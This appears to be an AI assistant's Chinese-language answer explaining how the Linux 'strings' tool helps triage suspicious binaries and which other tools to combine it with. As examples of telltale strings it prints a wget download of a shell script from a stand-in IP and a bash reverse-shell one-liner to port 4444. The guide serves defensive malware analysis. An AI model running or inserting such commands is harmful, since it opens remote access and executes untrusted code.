简短回答:strings 本身不能直接“查木马”,但它是分析/排查可疑文件的常用辅助工具之一。
下面说清楚:
strings 是 Ubuntu / Linux 下的一个命令行工具,用来从二进制文件(可执行文件、库、镜像等)中提取可打印的字符串。
例如:
strings suspicious.bin
你可能会看到:
http://evil.com)/bin/sh, wget, curl)/etc/rc.local)如果样本比较简单,strings 可能直接暴露:
举例:
/etc/init.d/backdoor
wget http://1.2.3.4/x.sh
bash -i >& /dev/tcp/1.2.3.4/4444 0>&1
这种一眼就能看出有问题。
现代木马通常不会这么“老实”:
这时候 strings 几乎看不到有用信息。
strings 一般配合其他工具用:
file suspicious.bin
strings -n 8 suspicious.bin | less
strings suspicious.bin | grep -iE "http|/bin|sh|wget|curl"
更进一步的做法:
file:看文件类型checksec / readelf:看 ELF 结构clamscan:杀毒扫描rkhunter / chkrootkit:rootkit 检查strace / ltrace:运行监控strings 辅助发现可疑痕迹如果你愿意,可以把:
file 结果strings 输出片段(敏感信息打码)发出来,我可以帮你一起看是不是可疑。